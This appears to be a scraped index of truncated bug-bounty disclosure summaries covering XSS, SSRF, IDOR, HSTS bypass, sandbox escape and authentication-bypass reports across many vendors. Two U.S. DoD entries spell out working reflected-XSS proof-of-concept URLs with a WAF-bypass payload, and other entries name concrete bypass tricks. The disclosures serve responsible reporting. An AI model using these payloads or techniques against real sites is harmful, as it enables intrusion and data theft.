Rocket.Chat: Low authorization level at server side API operation e2e.updateGroupKey, let an attacker break the E2E architecture.

The E2E encryption feature in open.rocket.chat server had a vulnerability that allowed an attacker to break the encryption of a secure chat room. The vulnerability was caused by a low authorization level at the server-side API operation e2e.updateGroupKey, which allowed an attacker to insert or...

Nextcloud: Possibility to delete files attached to deck cards of other users

Hi everyone, Hope you are well ! I come to report here an IDOR vulnerability on the Deck application of Nextcloud, allowing to delete any attached files on any cards. Nextcloud deck app version : latest stable 1.8.0 Steps To Reproduce: The Nextcloud Deck application now offers the ability to add ...

Flickr: Exceed photo dimensions, Flickr.com

Large negative numbers could be provided as a note's width and heigh which would be interpreted as positive integers and create notes beyond the normal size boundaries...

curl: CVE-2022-43551: Another HSTS bypass via IDN

Summary: I found an issue similar to CVE-2022-42916 again. Since the phenomenon is the same, I will describe the same as last time. HSTS checks are bypassed if any character in the IDN convertNameprep to a '.' for example"。"UTF-8:E38082. I think there are other characters that become ".UTF-8:2E" ...

Shopify: Reflected XSS In Marketing Reports Page On *.myshopify.com/admin

The returnpagepathname parameter on the marketing reports page of a Shopify store was vulnerable to reflected cross-site scripting XSS when using the javascript: protocol. The vulnerability was assessed as having high attack complexity, as specific conditions were required for the XSS to execute...

Cloudflare Public Bug Bounty: Extraction of Pages build scripts, config values, tokens, etc. via symlinks

A vulnerability was discovered in Pages build scripts that allowed malicious actors to extract build source/configuration and environment variables via symlinks due to broader permission set on certain folders within the filesystem structure. The issue was remediated by tightening permissions on...

Internet Bug Bounty: CVE-2022-42916: HSTS bypass via IDN

Original Report:https://hackerone.com/reports/1730660 Impact HSTS bypass...

Internet Bug Bounty: CVE-2022-35260: .netrc parser out-of-bounds access

Original Report:https://hackerone.com/reports/1721098 Impact If a malicious user can provide a custom netrc file to an application or otherwise affect its contents, this flaw could be used as denial-of-service...

Internet Bug Bounty: POST following PUT confusion

The bug I submitted at https://github.com/curl/curl/issues/9507 can have at least a few unintended security issues: Information Disclosure: this bug causes an HTTP PUT to occur when the user intends for an HTTP POST to occur. The user, who intended an HTTP POST, expects the POSTed information to...

MetaMask: MetaMask Browser URL and Transaction Origin Spoofing - Metamask wallet Android & Metamask wallet iOS

Vulnerability description not provided...

GitLab: Attacker is able to create,Edit & delete notes and leak the title of a victim's private personal snippet

An attacker was able to create, edit, and delete notes on a victim's private personal snippet, leaking the title of the snippet on the attacker's activity page. The attack was achieved by changing the POST parameter noteabletype from "issue" to "personalsnippet" and posting a comment within a...

Consensys: CSV Injection at https://assets-paris-demo.codefi.network/

Summary: Hi consensys Security Team. I have found CSV Injection when generate report at https://assets-paris-demo.codefi.network/ CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program such as Microsoft Excel or...

TikTok: bypass two-factor authentication in Android apps and web

A vulnerability was found where a random timeout issue on a Two-Step Verification endpoint could have resulted in a potential bypass of authentication if multiple incorrect attempts were entered in quick succession. It was found that this vulnerability required access to the user's email/password...

Node.js: Permissions policies can be bypassed via process.mainModule

A vulnerability was discovered in Node.js permission policies that allowed a script to include any non-whitelisted module by calling process.mainModule.require. This could allow an attacker to bypass the limited whitelist and access internal file systems or run child processes. The vulnerability...

U.S. Department of State: Bypassing Whitelist to perform SSRF for internal host scanning

A misconfiguration in the server-side request forgery SSRF protection of geonode.state.gov allowed for bypassing the whitelist and performing internal host scanning. The backend parsed the whitelist host as a credential host, allowing requests to be sent to hosts identified before the ""...

MTN Group: Authentication bypass in https://nin.mtn.ng

Summary: In a nutshell, an authentication bypass exploits weak authentication mechanisms to allow a hacker to access your systems and data.In a nutshell, an authentication bypass exploits weak authentication mechanisms to allow a hacker to access your systems and data Steps To Reproduce: 1.I was...

Nextcloud: Mail app - blind SSRF via smtpHost parameter

A blind SSRF vulnerability was discovered in the Nextcloud Mail application, allowing an attacker to retrieve services running locally on the server and scan the internal network for information. The vulnerability was found in the smtpHost parameter and could be exploited by any user with the mai...

Internet Bug Bounty: potential denial of service attack via the locale parameter

In Django 3.2 before 3.2.16, 4.0 before 4.0.8, and 4.1 before 4.1.2, internationalized URLs were subject to a denial of service attack via the locale parameter, which is treated as a regular expression. Impact By crafting a Python regex, a vulnerable site could suffer a DOS attack. The attack was...

Nextcloud: Disabled download shares still allow download through preview images

Summary: Steps To Reproduce: 1. Share a folder and disable the "Allow download" permission 2. Now as the recipient of the file you can still download the preview of the file This is an issue for images but also for shared documents where viewing them in Collabora would present them watermarked bu...

Nextcloud: Hide download previews are accessible without a watermark

A vulnerability was discovered in Nextcloud that allowed users to access download previews without a watermark, even when the watermark option was enabled. This could potentially compromise the privacy of the document and goes against the intended purpose of the feature...

Nextcloud: Insecure randomness for default password in file sharing when password policy app is disabled

The password generation function used for protecting shared links in Nextcloud was using an insecure random number generator, which could allow an attacker to access the shared files without knowledge of the password...

Reddit: read and message other user's messages

Vulnerability description not provided...

Adobe: HTML INJECTION on https://adobedocs.github.io/JourneyAPI/ due to outdated SWAGGER UI

Vulnerability description not provided...

TikTok: Business Suite "Get Leads" Resulting in Revealing User Email & Phone

A vulnerability within the Business Suite settings on an Android device could have resulted in a user's email and/or phone number being revealed via the "secuserid" parameter if their information is sent via "Get Leads". We thank @datph4m for reporting this to our team...

Nextcloud: Mail app - Blind SSRF via Sierve server fonctionnality and sieveHost parameter

A blind SSRF vulnerability was discovered in the Nextcloud Mail application, allowing an attacker to map the server and internal network by sending a crafted request to an unexpected destination. The vulnerability was found in the sieveHost parameter when adding a filter via a sieve filter server...

Nextcloud: CSRF vulnerability in Nextcloud Desktop Client 3.6.1 on Windows when clicking malicious link

Summary It is possible to make a user send any POST request with an arbitrary body given they click on a malicious deep link. e.g. in an email, chat link, etc This vulnerability was introduced in an attempt to fix 1720043. The patch however can be bypassed and also introduced a CSRF vulnerability...

Hyperledger: CVE-2017-5929: Hyperledger - Arbitrary Deserialization of Untrusted Data

Vulnerability Overview Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used f...

GitHub Security Lab: C/C++: Command injection via wordexp

Vulnerability description not provided...

GitHub Security Lab: [CPP]: Add query for CWE-125 Out-of-bounds Read with different interpretation of the string when use mbtowc

Vulnerability description not provided...

Flickr: IDOR may allow access to non-public photos

The IDOR vulnerability may have allowed access to non-public photos on Flickr. By adding discovered photo IDs for non-public photos uploaded by others to a Flickr group, the attacker could gain access to the third-party photos through their membership in the group...

Shopify: URL Scheme Validation Bypass in Shopify Mobile App Allows Javascript Execution

A vulnerability in the Shopify mobile application allowed bypassing URL scheme validation in the NavigationActivity component. Attackers could craft malicious URLs using data: or javascript: schemes to execute JavaScript code within the app's webview context...

Automattic: Akismet API keys are exposed by authentication method

We have switched to sending the Akismet API key as part of the request body by default. At the time of this report, Akismet API keys used formed part of the subdomain request to Akismet’s backend in the form api-key.rest.akismet.com. This means that the API key is transmitted over DNS - a protoco...

Adobe: HTML INJECTION FOUND ON https://adobedocs.github.io/analytics-1.4-apis/swagger-docs.html DUE TO OUTDATED SWAGGER UI

Responsible disclosure of HTML injection. Swagger UI has an interesting feature that allows you to provide a URL to API specification - a yaml or json file that will be fetched and displayed to the user. To do that you have to add a query parameter ?url=https://yourapispec/spec.yaml or...

U.S. Dept Of Defense: Reflected XSS | https://████████

Summary Hi team, there's a reflected XSS on https://████ using the plot param. There's a WAF in place but it's possible to bypass it. Steps to reproduce 1. Click https://██████████/fcgi-bin/getplot.py?plot=aaa%3Ch1%20onauxclick=confirmdocument.domain%3ERIGHT%20CLICK%20HERE 2. Observe the popup...

U.S. Dept Of Defense: Reflected XSS | https://████

Summary Hi team, there's a reflected XSS on https://█████████ using the project param. There's a WAF in place but it's possible to bypass it. Steps to reproduce 1. Click https://████████/fcgi-bin/release.py?project=aaa%3Ch1%20onauxclick=confirmdocument.domain%3ERIGHT%20CLICK%20HERE 2. Observe the...

Nextcloud: Mail app - blind SSRF via imapHost parameter

A blind SSRF vulnerability was discovered in the Nextcloud Mail application. An attacker could exploit this vulnerability to retrieve services running locally on the server and scan the internal network for information about which IPs are responding and which services are running on each IP...

Adobe: DOM XSS at `https://adobedocs.github.io/OAE_PartnerAPI/?configUrl={site}` due to outdated Swagger UI

Vulnerability description not provided...

Adobe: DOM XSS at `https://adobedocs.github.io/indesign-api-docs/?configUrl={site}` due to outdated Swagger UI

Vulnerability description not provided...

U.S. Dept Of Defense: XSS via Client Side Template Injection on www.███/News/Speeches

Dear DoD - Team, I am able to execute javascript code on www.███████/News/Speeches. This endpoint has a search functionality with the parameter Search. The supplied value to this parameter gets embedded into the website. Furthermore the frontend of the website is presumably created with a templat...

MTN Group: Reflected XSS in chatbot

Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim's browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts Pro...

MTN Group: Wordpress users Disclosure [ /wp-json/wp/v2/users/ ]

Summary: Using REST API, we can see all the WordPress users/author with some of their information. Which can even be Personal information of employees/author. The file v2/users at: https://www.mtn.com/wp-json/wp/v2/users/ is enabled and this give the attacker many users names like: Amogelang...

LinkedIn: IDOR to make someone attend or leave an event

An Insecure Direct Object Reference IDOR vulnerability was discovered in LinkedIn's event attendance functionality. The vulnerability allowed an attacker to manipulate event attendance by modifying the fsdprofile parameter in POST requests to the voyagerScheduledcontentDashViewerStates API...

TikTok: IDOR for changing privacy settings on any memories

Vulnerability description not provided...

GitHub: Github app Privilege Escalation to Administrator/Owner of the Organization

Vulnerability description not provided...

curl: CVE-2022-42916: HSTS bypass via IDN

Summary: HSTS checks are bypassed if any character in the IDN convertNameprep to a '.' for example"。"UTF-8:E38082. I think there are other characters that become ".UTF-8:2E" as a result of converting with IDN. '。UTF-8:E38082' is converted to '.' so it doesn't matter if it's last or not. So the sa...

Cloudflare Public Bug Bounty: Cloudflare is not properly deleting user's account

Vulnerability description not provided...

Kubernetes: Ingress nginx annotation injection causes arbitrary command execution

A vulnerability was found where arbitrary commands could be executed on the Kubernetes cluster. Through annotation injection on the ingress resource, additional locations could be added to the nginx configuration, allowing commands to be passed and executed via the lua scripting engine on the...

LinkedIn: User Details Can Be Disclosed Even If The Account IS In Hibernation State

User details were disclosed via link previews on LinkedIn posts even when the account was in hibernation state...

Nextcloud: No password length limit when creating a user as an administrator

Hi, when I try to set the password while creating an account I noticed that you haven't kept any password limit. You need to decrease password length: There are two reasons for limiting the password size. For one, hashing a large amount of data can cause significant resource consumption on behalf...

HackerOne: Improper CSRF token validation allows attackers to access victim's accounts linked to Hackerone

Improper CSRF token validation in HackerOne's integration authentication server allowed attackers to access victim's accounts linked to HackerOne. This vulnerability was due to the flawed authorization flow in which the CSRF token was not properly validated, making it possible for attackers to...